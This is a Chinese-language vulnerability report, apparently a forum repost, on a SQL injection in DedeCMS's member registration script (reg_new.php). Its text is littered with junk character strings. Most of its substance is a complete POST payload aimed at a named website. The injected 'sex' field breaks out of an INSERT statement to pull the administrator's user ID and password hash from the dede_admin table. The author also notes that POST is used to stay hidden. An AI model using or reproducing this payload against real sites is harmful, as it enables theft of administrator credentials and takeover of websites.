漏洞类型: SQL注射漏洞
- q& H" z7 A( ^$ r1 }- }. g简要描述:7 a; W( z8 O) Z+ S6 a, F
! T" J+ n: @5 l" b& O4 P, E" Z2 u
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
2 K5 A/ B" |+ d& v" Z原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.- C ]7 c( G9 Y/ _" h
详细说明:跟这个漏洞
7 P$ }1 Y3 j5 Z) m8 E
4 j. z3 H2 L, l! @. t5 w6 f& KWooYun: Dedecms SQL注射导致审核机制绕过漏洞
$ u& u+ o9 D" ?$ l是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.3 C* @2 A% i" x) W
POST提交以下数据,其实不用POST提交的,这样隐蔽点.. Z- y- g; J. [, W5 p# O
: z8 F& R$ G! t6 c$ m+ w3 _* \
www.political-security.com/member/reg_new.php9 u+ @4 \7 r& j, x% h" d0 \- i
/ r) ]2 r o3 \9 w/ Z* U/ _POST1 U' \. m7 ]. O' b9 F
' T$ i8 \1 X# y# O- _dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&' b" K; J. ~* J- ]- G( C P
userid=c4rp3nt3r&uname=c4rp3nt3r
& ?9 m# ?6 r }# n7 p, V&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss/ Q5 {* p; c, E; N6 l0 E
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
' n* e1 r7 r6 R8 |) C' u(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
- d8 ~; T4 a( G+ N! K+ h5 F%00&vdcode=glos&agree= |